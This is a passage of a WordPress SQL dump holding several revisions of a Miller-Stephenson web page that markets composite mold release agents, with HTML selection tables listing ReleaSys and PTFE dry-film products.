style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">MS-122AV or MS-143TE</span></td>\r\n<td>• PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td>• No transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8800</span></td>\r\n<td>• Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8900</span></td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8900</span></td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 20:11:25', '2016-11-08 20:11:25', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2945, 3, '2016-11-08 20:13:59', '2016-11-08 20:13:59', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite mold material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Cermaic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents and PTFE Dry Film release agents, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">Product Application Guide</span></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8900</span></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8500</span></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">MS-122AV or MS-143TE</span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8800</span></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8900</span></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8900</span></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 20:13:59', '2016-11-08 20:13:59', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2946, 3, '2016-11-08 20:14:46', '2016-11-08 20:14:46', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite mold material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Cermaic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents and PTFE Dry Film release agents, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">Release Agent Selection Guide</span></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8900</span></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8500</span></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">MS-122AV or MS-143TE</span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8800</span></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8900</span></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">ReleaSys 8900</span></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 20:14:46', '2016-11-08 20:14:46', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2947, 3, '2016-11-08 20:21:34', '2016-11-08 20:21:34', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite mold material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Cermaic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents and PTFE Dry Film release agents, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">Release Agent Selection Guide</span></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 20:21:34', '2016-11-08 20:21:34', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
